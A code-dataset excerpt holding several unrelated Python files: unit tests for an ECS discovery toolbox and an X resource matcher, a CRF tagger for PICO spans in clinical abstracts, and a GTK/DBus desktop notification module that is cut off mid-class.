hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a07ac0d9bb2955a02af37b63e53a1f87c387621
| 2,479
|
py
|
Python
|
tests/test_toolbox.py
|
lejmr/prometheus-ecs-discoverer
|
d4968c6e3f8588a9f64157462a82420d099ac583
|
[
"Apache-2.0"
] | 12
|
2020-08-06T15:17:47.000Z
|
2021-10-06T05:21:06.000Z
|
tests/test_toolbox.py
|
lejmr/prometheus-ecs-discoverer
|
d4968c6e3f8588a9f64157462a82420d099ac583
|
[
"Apache-2.0"
] | 11
|
2020-08-01T22:13:29.000Z
|
2021-10-08T06:17:34.000Z
|
tests/test_toolbox.py
|
lejmr/prometheus-ecs-discoverer
|
d4968c6e3f8588a9f64157462a82420d099ac583
|
[
"Apache-2.0"
] | 3
|
2021-04-19T20:47:10.000Z
|
2021-10-01T14:29:09.000Z
|
import pytest
from prometheus_ecs_discoverer import toolbox
def test_chunk_list_with_even_size():
    """chunk_list splits an evenly divisible list into equal-size chunks."""
    items = list(range(100))
    chunks = toolbox.chunk_list(items, 10)
    assert len(chunks) == 10
    assert all(len(chunk) <= 10 for chunk in chunks)
def test_chunk_list_with_uneven_size():
    """chunk_list puts the remainder into a final, smaller chunk."""
    items = list(range(103))
    chunks = toolbox.chunk_list(items, 10)
    assert len(chunks) == 11
    assert all(len(chunk) <= 10 for chunk in chunks)
    assert len(chunks[-1]) == 3
def test_extract_set():
    """extract_set collects the distinct values of one attribute."""
    data = {
        "descr1": {"att1": "fefefe", "att2": "fefegtrafgrgr"},
        "descr2": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
        "descr3": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
    }
    result = toolbox.extract_set(data, "att1")
    assert result == {"fefefe", "OGOGOGO"}
    assert len(result) == 2
def test_list_to_dict():
    """list_to_dict keys each entry by the given attribute."""
    entries = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
    expected = {
        "hallo": {"key1": "hallo", "key2": "my"},
        "old": {"key1": "old", "key2": "friend"},
    }
    assert toolbox.list_to_dict(entries, "key1") == expected
def test_print_structure():
    """pstruct should run without raising on a list of dicts."""
    entries = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
    toolbox.pstruct(entries)
    assert True
def test_validate_min_len():
    """validate_min_len raises ValueError only when a collection is too short."""
    collections = [{"this": "dict", "is": "too long"}, {"good": {"dict": "only", "len": "one"}}]
    with pytest.raises(ValueError):
        toolbox.validate_min_len(min_len=10, collections=collections)
    # A minimum of one is satisfied by both collections and must not raise.
    toolbox.validate_min_len(min_len=1, collections=collections)
    assert True
# ------------------------------------------------------------------------------
def test_extract_env_var():
    """extract_env_var reads a named value from the container environment."""
    container = {
        "random": {"random": "random"},
        "environment": [
            {"name": "PROMETHEUS_PORT", "value": "80"},
            {"name": "SOMETINGELSE", "value": "fefefwe"},
        ],
    }
    assert toolbox.extract_env_var(container, "PROMETHEUS_PORT") == "80"
    assert toolbox.extract_env_var(container, "does not exist") is None
def test_extract_env_var_no_env():
    """A container without an environment list yields None for any variable."""
    container = {"random": {"random": "random"}}
    assert toolbox.extract_env_var(container, "PROMETHEUS_PORT") is None
# ------------------------------------------------------------------------------
def test_extract_env_var_no_environment():
    """Unknown variable on a container without environment yields None."""
    container = {"random": {"random": "random"}}
    assert toolbox.extract_env_var(container, "does not exist") is None
| 26.37234
| 88
| 0.567568
|
4a07ac850b9e6883d26af6f9d28ab85e817e612e
| 10,183
|
py
|
Python
|
crf-seq/sets/sets/2/seq_detect_1o.py
|
roma-patel/lstm-crf
|
25012b1218b60090f467fe5ed5a15d7a28b3134c
|
[
"Apache-2.0"
] | 1
|
2020-02-24T06:25:17.000Z
|
2020-02-24T06:25:17.000Z
|
crf-seq/sets/sets/2/seq_detect_1o.py
|
roma-patel/lstm-crf
|
25012b1218b60090f467fe5ed5a15d7a28b3134c
|
[
"Apache-2.0"
] | null | null | null |
crf-seq/sets/sets/2/seq_detect_1o.py
|
roma-patel/lstm-crf
|
25012b1218b60090f467fe5ed5a15d7a28b3134c
|
[
"Apache-2.0"
] | null | null | null |
import pycrfsuite
import sklearn
from itertools import chain
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelBinarizer
import re
import json
annotypes = ['Participants', 'Intervention', 'Outcome']
annotype = annotypes[2]
path = '/nlp/data/romap/crf/'
#path = '/Users/romapatel/Desktop/crf/'
def run():
    # Train a linear-chain CRF for the selected annotation type and write
    # predicted/gold spans for the held-out test split (see get_results).
    train_sents, test_sents = get_train_test_sets()
    # Python 2 print statement: log the size of the test split.
    print len(test_sents)
    indwords_list = get_ind_words()
    patterns_list = get_patterns()
    # Feature and label sequences, one entry per document.
    X_train = [sent_features(train_sents[docid], indwords_list, patterns_list) for docid in train_sents.keys()]
    y_train = [sent_labels(train_sents[docid]) for docid in train_sents.keys()]
    X_test = [sent_features(test_sents[docid], indwords_list, patterns_list) for docid in test_sents.keys()]
    y_test = [sent_labels(test_sents[docid]) for docid in test_sents.keys()]
    trainer = pycrfsuite.Trainer(verbose=False)
    for xseq, yseq in zip(X_train, y_train):
        trainer.append(xseq, yseq)
    # c1/c2 are the L1/L2 regularisation coefficients of crfsuite.
    trainer.set_params({'c1': 1.0,'c2': 1e-3, 'max_iterations': 50, 'feature.possible_transitions': True})
    trainer.train('PICO.crfsuite')
    # Reload the freshly trained model for tagging.
    tagger = pycrfsuite.Tagger()
    tagger.open('PICO.crfsuite')
    get_results(test_sents, tagger, indwords_list, patterns_list)
def _extract_spans(labels):
    """Convert a '0'/'1' label sequence into [start, end] index pairs.

    A span opens at the first '1' seen while outside a span and closes at
    the next '0'; the recorded end index is that of the closing '0' plus
    one, matching the original inline encoding.
    NOTE(review): a span still open at the end of the sequence is dropped,
    exactly as in the original inline code -- confirm this is intended.
    """
    spans, span, outside = [], [], True
    for i in range(len(labels)):
        if labels[i] == '0' and outside is False:
            span.append(i + 1)
            spans.append(span)
            span, outside = [], True
        elif labels[i] == '1' and outside is True:
            outside = False
            span.append(i)
    return spans


def get_results(test_sents, tagger, indwords_list, patterns_list):
    """Tag every test document and dump predicted and gold spans as JSON.

    Writes two files under sets/2/: <annotype>-test_pred.json with the
    tagger's spans and <annotype>-test_correct.json with the gold spans.
    """
    pred_dict, correct_dict = {}, {}
    for docid in test_sents:
        features = sent_features(test_sents[docid], indwords_list, patterns_list)
        pred_dict[docid] = _extract_spans(tagger.tag(features))
        correct_dict[docid] = _extract_spans(sent_labels(test_sents[docid]))
    # Use context managers so the handles are flushed and closed reliably
    # (the original leaked both file objects).
    with open(path + 'sets/2/' + annotype + '-test_pred.json', 'w+') as f1:
        f1.write(json.dumps(pred_dict))
    with open(path + 'sets/2/' + annotype + '-test_correct.json', 'w+') as f2:
        f2.write(json.dumps(correct_dict))
def get_ind_words():
    """Load indicator-word lists for each annotation type.

    Reads one unigram TSV per annotation type (lines of "<rank>\t<word>"),
    plus a drug-name list for the Intervention type, and returns a list of
    three de-duplicated word lists ordered [Participants, Intervention,
    Outcome].
    """
    fin_list = []
    for anno in annotypes:
        # Renamed from `list`, which shadowed the builtin.
        words = []
        filename = anno.lower() + '_unigrams.tsv'
        # `with` closes the handle; the original leaked every file object.
        with open(path + 'crf_files/' + filename, 'r') as f:
            for line in f:
                items = line.split('\t')
                # Second column, minus the trailing newline.
                word = items[1][:-1]
                if word not in words:
                    words.append(word)
        if anno == 'Intervention':
            # Interventions additionally match a curated drug-name list.
            with open(path + 'crf_files/drug_names.txt', 'r') as f:
                for line in f:
                    word = line[:-1]
                    if word not in words:
                        words.append(word)
        fin_list.append(words)
    return [fin_list[0], fin_list[1], fin_list[2]]
#all lowercased
def get_patterns():
    """Load trigram pattern lists for each annotation type.

    Reads one trigram TSV per annotation type (lines of "<rank>\t<pattern>")
    and returns a list of three de-duplicated pattern lists ordered
    [Participants, Intervention, Outcome]. Patterns are stored lowercased
    in the source files.
    """
    fin_list = []
    for anno in annotypes:
        # Renamed from `list`, which shadowed the builtin.
        patterns = []
        filename = anno.lower() + '_trigrams3.tsv'
        # `with` closes the handle; the original leaked every file object.
        with open(path + 'crf_files/' + filename, 'r') as f:
            for line in f:
                # Strip the newline, then take the second column.
                word = line[:-1].split('\t')[1]
                if word not in patterns:
                    patterns.append(word)
        fin_list.append(patterns)
    return [fin_list[0], fin_list[1], fin_list[2]]
def isindword(word, annotype, indwords_list):
    """Return True if *word* looks like an indicator word for *annotype*.

    The lowercased word, the word minus its final character (a crude
    de-pluralisation) and its last three characters (suffix) are each
    checked against the indicator list selected by *annotype*.
    """
    # Select the per-annotype list; renamed from `list` (shadowed builtin).
    if annotype == annotypes[0]:
        words = indwords_list[0]
    elif annotype == annotypes[1]:
        words = indwords_list[1]
    else:
        words = indwords_list[2]
    # Lowercase once instead of three times per call.
    lowered = word.lower()
    return lowered in words or lowered[:-1] in words or lowered[-3:] in words
def ispattern(word, pos, annotype, pattern_list):
    """Return True if *word* or *pos* occurs inside any pattern for *annotype*.

    Patterns are stored lowercased, so the word and the POS tag are
    lowercased before the substring check.
    """
    # Select the per-annotype list; renamed from `list` (shadowed builtin).
    if annotype == annotypes[0]:
        patterns = pattern_list[0]
    elif annotype == annotypes[1]:
        patterns = pattern_list[1]
    else:
        patterns = pattern_list[2]
    # BUG FIX: the original iterated the outer pattern_list (three lists)
    # instead of the selected list, and its `else: return False` bailed out
    # after inspecting only the first element.
    word_lower = word.lower()
    pos_lower = pos.lower()
    for pattern in patterns:
        if word_lower in pattern or pos_lower in pattern:
            return True
    return False
def word_features(sent, i, indwords_list, pattern_list):
    """Build the CRF feature list for token *i* of sentence *sent*.

    *sent* is a sequence of 6-tuples (token, ner, postag, p_label, i_label,
    o_label); the module-level `annotype` selects which indicator-word and
    pattern lists are consulted.
    """
    word = sent[i][0]
    postag = sent[i][2]
    # Features of the current token itself.
    features = ['bias', 'word.lower=' + word.lower(),'word[-3:]=' + word[-3:],
        'word[-4:]=' + word[-4:],'word.isupper=%s' % word.isupper(),
        'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit(),
        'postag=' + postag, 'isindword=%s' % isindword(word, annotype, indwords_list),
        'word[0:4]=' + word[0:4], 'ispattern=%s' % ispattern(word, postag, annotype, pattern_list)]
    # Token two positions back.
    # NOTE(review): this branch reuses the '-1:' prefix and re-adds features
    # of the *current* word (word[0:4], word[-3:]) -- looks like a
    # copy-paste slip from the i-1 branch; confirm before relying on it.
    if i > 1:
        word1 = sent[i-2][0]
        postag1 = sent[i-2][2]
        features.extend(['-1:word.lower=' + word1.lower(), '-1:word.istitle=%s' % word1.istitle(),
            '-1:word.isupper=%s' % word1.isupper(), '-1:postag=' + postag1,
            'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
            'word[-3:]=' + word[-3:]])
    # Immediately previous token, or the beginning-of-sentence marker.
    if i > 0:
        word1 = sent[i-1][0]
        postag1 = sent[i-1][2]
        features.extend(['-1:word.lower=' + word1.lower(), '-1:word.istitle=%s' % word1.istitle(),
            '-1:word.isupper=%s' % word1.isupper(), '-1:postag=' + postag1,
            'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
            'word[-3:]=' + word[-3:], 'ispattern=%s' % ispattern(word, postag, annotype, pattern_list)])
    else:
        features.append('BOS')
    # Token two positions ahead (same prefix/current-word quirk as above,
    # with '+1:' prefixes).
    if i < len(sent)-2:
        word1 = sent[i+2][0]
        postag1 = sent[i+2][2]
        features.extend(['+1:word.lower=' + word1.lower(), '+1:word.istitle=%s' % word1.istitle(),
            '+1:word.isupper=%s' % word1.isupper(), '+1:postag=' + postag1,
            'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
            'word[-3:]=' + word[-3:]])
    # Immediately next token, or the end-of-sentence marker.
    if i < len(sent)-1:
        word1 = sent[i+1][0]
        postag1 = sent[i+1][2]
        features.extend(['+1:word.lower=' + word1.lower(), '+1:word.istitle=%s' % word1.istitle(),
            '+1:word.isupper=%s' % word1.isupper(), '+1:postag=' + postag1,
            'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
            'word[-3:]=' + word[-3:], 'ispattern=%s' % ispattern(word, postag, annotype, pattern_list)])
    else:
        features.append('EOS')
    return features
def sent_features(sent, indwords_list, patterns_list):
    """Return the per-token CRF feature lists for a whole sentence."""
    features = []
    for index in range(len(sent)):
        features.append(word_features(sent, index, indwords_list, patterns_list))
    return features
def sent_labels(sent):
    """Return the outcome label (last tuple field) of each token as a string."""
    labels = []
    for token, ner, postag, p_label, i_label, o_label in sent:
        labels.append(str(o_label))
    return labels
def sent_tokens(sent):
    """Return the surface token (first tuple field) of each sentence entry."""
    tokens = []
    for token, ner, postag, p_label, i_label, o_label in sent:
        tokens.append(token)
    return tokens
def print_results(example_sent, tagger, indwords_list, docid, dict):
    """Pretty-print predicted vs. gold spans for one sentence (debug helper).

    NOTE(review): `sent_features` takes (sent, indwords_list, patterns_list);
    this call passes only two arguments and would raise a TypeError, so the
    function appears to be stale/dead code. The `dict` parameter shadows the
    builtin and is unused, and the file handle `f` below is opened but never
    written to or closed. Confirm before reviving this helper.
    """
    pred, correct = tagger.tag(sent_features(example_sent, indwords_list)), sent_labels(example_sent)
    spans, span, outside = [], [], True
    # Collect predicted spans: a span opens at a '1' seen while outside and
    # closes at the next '0' (recorded end index is that of the '0' plus one).
    for i in range(len(pred)):
        if pred[i] == '0' and outside is True: continue
        elif pred[i] == '0' and outside is False:
            span.append(i+1)
            spans.append(span)
            span, outside = [], True
        elif pred[i] == '1' and outside is False: continue
        elif pred[i] == '1' and outside is True:
            outside = False
            span.append(i)
    f = open(path + annotype + '-test.json', 'w+')
    # Python 2 print statements below.
    print '\n\nPredicted: ' + str(spans)
    for span in spans:
        s = ' '
        for i in range(span[0], span[1]):
            s += example_sent[i][0] + ' '
        print s
    # Repeat the same span extraction for the gold labels.
    spans, span, outside = [], [], True
    for i in range(len(correct)):
        if correct[i] == '0' and outside is True: continue
        elif correct[i] == '0' and outside is False:
            span.append(i+1)
            spans.append(span)
            span, outside = [], True
        elif correct[i] == '1' and outside is False: continue
        elif correct[i] == '1' and outside is True:
            outside = False
            span.append(i)
    print '\n\nCorrect: ' + str(spans)
    for span in spans:
        s = ' '
        for i in range(span[0], span[1]):
            s += example_sent[i][0] + ' '
        print s
def get_training_data():
    """Parse the training-data JSON file (one JSON object per line).

    Returns the dict parsed from the last line of the file; the file is
    expected to contain a single JSON line. Returns an empty dict for an
    empty file (the original raised NameError in that case).
    """
    doc_dict = {}
    # `with` closes the handle; the original leaked it. Also renamed the
    # result from `dict`, which shadowed the builtin.
    with open(path + 'crf_files/difficulty_crf_mv.json', 'r') as f:
        for line in f:
            doc_dict = json.loads(line)
    return doc_dict
def get_train_test_sets():
    """Split annotated documents into (train_sents, test_sents) dicts.

    Documents whose ids appear in gold_docids.txt form the test set; all
    others go to training. The training set is then topped up from
    difficulty_new.json until a hard-coded document budget is reached.
    """
    test_docids = []
    f = open(path + 'crf_files/gold_docids.txt', 'r')
    for line in f:
        # Strip the trailing newline.
        test_docids.append(line[:-1])
    doc_dict = get_training_data()
    test_sents, train_sents = {}, {}
    count = 0
    for docid in doc_dict:
        sents = doc_dict[docid]
        # Skip documents with no sentences.
        if len(sents) == 0: continue
        count += 1
        #if count >= 100: break
        if docid not in test_docids:
            train_sents[docid] = sents
        else:
            test_sents[docid] = sents
    # difficulty_new.json holds one JSON object per line; the loop leaves
    # doc_dict_new bound to the dict parsed from the last line.
    f = open(path + 'difficulty_new.json', 'r')
    for line in f:
        doc_dict_new = json.loads(line)
    count = 1
    # Top up the training set until the hard-coded budget of 4741 documents.
    for docid in doc_dict_new:
        if docid in train_sents.keys(): continue
        if count == 4741: break
        train_sents[docid] = doc_dict_new[docid]
        count += 1
    return train_sents, test_sents
# Entry point: train and evaluate the CRF sequence tagger.
if __name__ == '__main__':
    run()
| 38.426415
| 130
| 0.578022
|
4a07ac85e1dd6a28b82dfdeb1af6ecb560da1b4f
| 1,588
|
py
|
Python
|
tests/test_match.py
|
atagen/xparser
|
35e6d5aecd7a7c775309a206e457ee3a00c3fc53
|
[
"MIT"
] | 2
|
2018-05-28T20:16:18.000Z
|
2021-06-30T02:39:52.000Z
|
tests/test_match.py
|
atagen/xparser
|
35e6d5aecd7a7c775309a206e457ee3a00c3fc53
|
[
"MIT"
] | 4
|
2021-01-28T14:05:17.000Z
|
2021-12-15T23:05:09.000Z
|
tests/test_match.py
|
atagen/xparser
|
35e6d5aecd7a7c775309a206e457ee3a00c3fc53
|
[
"MIT"
] | 2
|
2019-06-24T20:56:34.000Z
|
2021-12-15T23:08:51.000Z
|
import pytest
import xrp.match
class Test_MatchResource:
    """Unit tests for the private xrp.match._MatchResource helper."""

    @pytest.mark.parametrize('resource_id,components', [
        ('*color0', ['*', 'color0']),
        ('?.color0', ['?', 'color0']),
        ('URxvt*foreground', ['URxvt', '*', 'foreground']),
        ('comp_a.*.comp_d.attribute', ['comp_a', '*', 'comp_d', 'attribute'])
    ])
    def test_components(self, resource_id, components):
        """A resource id splits into its components, keeping wildcard tokens."""
        assert xrp.match._MatchResource.components(resource_id) == components

    @pytest.mark.parametrize('components,padded', [
        (['comp_a', '*', 'comp_d', 'attribute'], ['comp_a', '?', 'comp_d', 'attribute']),
        (['*', 'color0'], ['?', '?', '?', 'color0'])
    ])
    def test_pad_components(self, components, padded):
        """'*' entries are expanded into '?' entries to pad the component list."""
        assert xrp.match._MatchResource.pad_components(components) == padded

    @pytest.mark.parametrize('comp_1,comp_2,result', [
        ('URXvt', '?', True),
        ('?', 'color0', True),
        ('URxvt', 'color0', False),
        ('color0', 'color0', True)
    ])
    def test_compare_component(self, comp_1, comp_2, result):
        """'?' matches any single component; otherwise exact equality is required."""
        assert xrp.match._MatchResource.compare_component(comp_1, comp_2) == result

    @pytest.mark.parametrize('resource_id,string,result', [
        ("comp_a.*.comp_d.attribute", "comp_a.*.attribute", True),
        ("comp_a.comp_b.*.attribute", "comp_a.comp_b.*.comp_d.attribute", True),
        ("comp_a.?.?.comp_d.attribute", "comp_a.*.attribute", True)
    ])
    def test_compare(self, resource_id, string, result):
        """End-to-end comparison of a resource id against a query string."""
        mr = xrp.match._MatchResource(resource_id, string)
        assert mr.compare() == result
| 38.731707
| 89
| 0.604534
|
4a07acc95882ce20e1dbf86d22afb6b05e9a8741
| 12,581
|
py
|
Python
|
notus/gtk_dbus/gtk_toaster.py
|
cnheider/notus
|
f284132e87d7b274c3ea239f216959987e670910
|
[
"Apache-2.0"
] | null | null | null |
notus/gtk_dbus/gtk_toaster.py
|
cnheider/notus
|
f284132e87d7b274c3ea239f216959987e670910
|
[
"Apache-2.0"
] | null | null | null |
notus/gtk_dbus/gtk_toaster.py
|
cnheider/notus
|
f284132e87d7b274c3ea239f216959987e670910
|
[
"Apache-2.0"
] | 2
|
2021-02-04T15:04:16.000Z
|
2021-02-04T15:05:30.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import GdkPixbuf
import time
import dbus
__author__ = "Christian Heider Nielsen"
__doc__ = (
"Based on the notifications spec at: http://developer.gnome.org/notification-spec/"
)
__version__ = "0.0.1"
EXPIRES_DEFAULT = -1
EXPIRES_NEVER = 0
URGENCY_LOW = 0
URGENCY_NORMAL = 1
URGENCY_CRITICAL = 2
urgency_levels = [URGENCY_LOW, URGENCY_NORMAL, URGENCY_CRITICAL]
IS_SETUP = False
APP_NAME = f"unnamed_app_{time.time()}"
HAVE_MAINLOOP = False
NOTIFICATIONS_REGISTRY = {}
__all__ = ["GtkToast"]
def action_callback(nid, action, notifications_registry) -> None:
    """Dispatch a DBus ActionInvoked signal to the matching notification.

    :param nid: notification id delivered with the signal
    :param action: key of the invoked action
    :param notifications_registry: mapping of int id -> GtkToast instance
    :return: None
    """
    nid, action = int(nid), str(action)
    try:
        n = notifications_registry[nid]
    except KeyError:  # this message was created through some other program.
        return
    # BUG FIX: GtkToast exposes the dispatcher as `_action_callback(action)`;
    # the original called a non-existent `action_callback` attribute with an
    # extra argument, so action callbacks could never fire.
    n._action_callback(action)
def closed_callback(nid, reason, notifications_registry) -> None:
    """Dispatch a DBus NotificationClosed signal and drop the notification.

    :param nid: notification id delivered with the signal
    :param reason: integer close-reason code (converted, not otherwise used)
    :param notifications_registry: mapping of int id -> GtkToast instance
    :return: None
    """
    nid, reason = int(nid), int(reason)
    try:
        n = notifications_registry[nid]
    except KeyError:  # this message was created through some other program.
        return
    # BUG FIX: the user callback is stored as `_closed_callback` (set by
    # GtkToast.connect, default no_op); the original referenced a
    # non-existent `closed_callback` attribute and raised AttributeError.
    n._closed_callback(n)
    del notifications_registry[nid]
def no_op(*args):
    """Default callback: accept any arguments and do nothing."""
    return None
# TODO: Object orient globals!
class NotSetupError(RuntimeError):
    """Raised when the server is used before :func:`init` has been called."""
class UnconstructedDbusObject(object):
    """Placeholder standing in for the DBus interface before :func:`init` runs."""

    def __getattr__(self, attribute):
        # Any attribute access means the module was used too early.
        raise NotSetupError("You must call toaster.init() first")
dbus_interface = UnconstructedDbusObject()
def init(app_name, mainloop=None):
    """Initialise the D-Bus connection. Must be called before you send any
    notifications, or retrieve server info or capabilities.
    To get callbacks from notifications, DBus must be integrated with a mainloop.
    There are three ways to achieve this:
    - Set a default mainloop (dbus.set_default_main_loop) before calling init()
    - Pass the mainloop parameter as a string 'glib' or 'qt' to integrate with
    those mainloops. (N.B. passing 'qt' currently makes that the default dbus
    mainloop, because that's the only way it seems to work.)
    - Pass the mainloop parameter a DBus compatible mainloop instance, such as
    dbus.mainloop.glib.DBusGMainLoop().
    If you only want to display notifications, without receiving information
    back from them, you can safely omit mainloop."""
    global APP_NAME, IS_SETUP, dbus_interface, HAVE_MAINLOOP
    if mainloop == "glib":
        from dbus.mainloop.glib import DBusGMainLoop

        mainloop = DBusGMainLoop()
    elif mainloop == "qt":
        from dbus.mainloop.qt import DBusQtMainLoop

        # For some reason, this only works if we make it the default mainloop
        # for dbus. That might make life tricky for anyone trying to juggle two
        # event loops, but I can't see any way round it.
        mainloop = DBusQtMainLoop(set_as_default=True)
    bus = dbus.SessionBus(mainloop=mainloop)
    # Proxy for the notification daemon's well-known name and object path.
    dbus_obj = bus.get_object(
        "org.freedesktop.Notifications", "/org/freedesktop/Notifications"
    )
    dbus_interface = dbus.Interface(
        dbus_obj, dbus_interface="org.freedesktop.Notifications"
    )
    APP_NAME = app_name
    IS_SETUP = True
    # Signal subscriptions only work when a DBus mainloop is available.
    if mainloop or dbus.get_default_main_loop():
        HAVE_MAINLOOP = True
        dbus_interface.connect_to_signal("ActionInvoked", action_callback)
        dbus_interface.connect_to_signal("NotificationClosed", closed_callback)
    return True
def is_initted():
    """Report whether :func:`init` has been called.

    Only exists for compatibility with pynotify.
    """
    return IS_SETUP
def get_app_name():
    """Return the application name registered with :func:`init`.

    Only exists for compatibility with pynotify.
    """
    return APP_NAME
def de_init():
    """Reset the module state established by :func:`init`."""
    global IS_SETUP, dbus_interface, HAVE_MAINLOOP
    dbus_interface = UnconstructedDbusObject()
    IS_SETUP = False
    HAVE_MAINLOOP = False
# Retrieve basic server information --------------------------------------------
def get_server_caps():
    """Get a list of server capabilities.
    These are short strings, listed `in the spec
    <http://people.gnome.org/~mccann/docs/notification-spec/notification-spec-latest.html#commands>`_.
    Vendors may also list extra capabilities with an 'x-' prefix, e.g. 'x-canonical-append'."""
    capabilities = dbus_interface.GetCapabilities()
    return [str(capability) for capability in capabilities]
def get_server_info():
    """Return the server's name, vendor, version and spec-version as strings."""
    info = dbus_interface.GetServerInformation()
    keys = ("name", "vendor", "version", "spec-version")
    return {key: str(info[index]) for index, key in enumerate(keys)}
class GtkToast(object):
    """A notification object.
    summary : str
        The title text
    message : str
        The body text, if the server has the 'body' capability.
    icon : str
        Path to an icon image, or the name of a stock icon. Stock icons available
        in Ubuntu are `listed here <https://wiki.ubuntu.com/NotificationDevelopmentGuidelines
        #How_do_I_get_these_slick_icons>`_.
        You can also set an icon from data in your application - see
        :meth:`set_icon_from_pixbuf`."""

    _id = 0  # server-assigned notification id; 0 means "not shown yet"
    _timeout = -1  # -1 = server default settings
    _closed_callback = no_op  # user callback set via connect('closed', ...)

    def __init__(self, title, body="", *, icon=""):
        """Create a notification.

        :param title: summary/title text
        :param body: body text (requires the server's 'body' capability)
        :param icon: icon name/path string, or a GdkPixbuf.Pixbuf instance
        """
        self.title = title
        self.body = body
        self._hints = {}
        if isinstance(icon, GdkPixbuf.Pixbuf):
            self._icon = ""
            # BUG FIX: a raw Pixbuf object is not DBus-serialisable; the
            # "icon_data" hint must carry the (width, height, rowstride,
            # has_alpha, bits_per_sample, channels, data) structure, exactly
            # as set_icon_from_pixbuf already builds it.
            self.set_hint("icon_data", self._get_icon_struct(icon))
        else:
            self._icon = icon
        self._actions = {}
        self._data = {}  # Any data the user wants to attach

    def show(self):
        """Ask the server to show the notification.
        Call this after you have finished setting any parameters of the
        notification that you want."""
        nid = dbus_interface.Notify(
            APP_NAME,  # app_name (spec names)
            self._id,  # replaces_id
            self._icon,  # app_icon
            self.title,  # summary
            self.body,  # body
            self._make_actions_array(),  # actions
            self._hints,  # hints
            self._timeout,  # expire_timeout
        )
        self._id = int(nid)
        # Only register for callbacks when signals can actually be delivered.
        if HAVE_MAINLOOP:
            NOTIFICATIONS_REGISTRY[self._id] = self
        return True

    def update(self, title, body="", *, icon=None):
        """Replace the summary and body of the notification, and optionally its
        icon. You should call :meth:`show` again after this to display the
        updated notification."""
        self.title = title
        self.body = body
        if icon is not None:
            self._icon = icon

    def close(self):
        """Ask the server to close this notification."""
        if self._id != 0:
            dbus_interface.CloseNotification(self._id)

    def set_hint(self, key, value):
        """n.set_hint(key, value) <--> n.hints[key] = value
        See `hints in the spec <http://people.gnome.org/~mccann/docs/notification-spec/notification-spec-latest
        .html#hints>`_.
        Only exists for compatibility with pynotify."""
        self._hints[key] = value

    set_hint_string = set_hint_int32 = set_hint_double = set_hint

    def set_hint_byte(self, key, value):
        """Set a hint with a dbus byte value. The input value can be an
        integer or a bytes string of length 1."""
        self._hints[key] = dbus.Byte(value)

    def set_urgency(self, level):
        """Set the urgency level to one of URGENCY_LOW, URGENCY_NORMAL or
        URGENCY_CRITICAL."""
        if level not in urgency_levels:
            raise ValueError("Unknown urgency level specified", level)
        self.set_hint_byte("urgency", level)

    def set_category(self, category):
        """Set the 'category' hint for this notification.
        See `categories in the spec <http://people.gnome.org/~mccann/docs/notification-spec/notification-spec
        -latest.html#categories>`_."""
        self._hints["category"] = category

    def set_timeout(self, timeout):
        """Set the display duration in milliseconds, or one of the special
        values EXPIRES_DEFAULT or EXPIRES_NEVER. This is a request, which the
        server might ignore.
        Only exists for compatibility with pynotify; you can simply set::
        n.timeout = 5000"""
        if not isinstance(timeout, int):
            raise TypeError("timeout value was not int", timeout)
        self._timeout = timeout

    def get_timeout(self):
        """Return the timeout value for this notification.
        Only exists for compatibility with pynotify; you can inspect the
        timeout attribute directly."""
        return self._timeout

    def add_action(self, action, label, callback, user_data=None):
        """Add an action to the notification.
        Check for the 'actions' server capability before using this.
        action : str
            A brief key.
        label : str
            The text displayed on the action button
        callback : callable
            A function taking at 2-3 parameters: the Notification object, the
            action key and (if specified) the user_data.
        user_data :
            An extra argument to pass to the callback."""
        self._actions[action] = (label, callback, user_data)

    def _make_actions_array(self):
        """Make the actions array to send over DBus.

        The spec wants a flat list of alternating action keys and labels.
        """
        arr = []
        for action, (label, callback, user_data) in self._actions.items():
            arr.append(action)
            arr.append(label)
        return arr

    def _action_callback(self, action):
        """Called when the user selects an action on the notification, to
        dispatch it to the relevant user-specified callback."""
        try:
            label, callback, user_data = self._actions[action]
        except KeyError:
            return
        if user_data is None:
            callback(self, action)
        else:
            callback(self, action, user_data)

    def connect(self, event, callback):
        """Set the callback for the notification closing; the only valid value
        for event is 'closed' (the parameter is kept for compatibility with pynotify).
        The callback will be called with the :class:`Notification` instance."""
        if event != "closed":
            raise ValueError("'closed' is the only valid value for event", event)
        self._closed_callback = callback

    def set_data(self, key, value):
        """n.set_data(key, value) <--> n.data[key] = value
        Only exists for compatibility with pynotify."""
        self._data[key] = value

    def get_data(self, key):
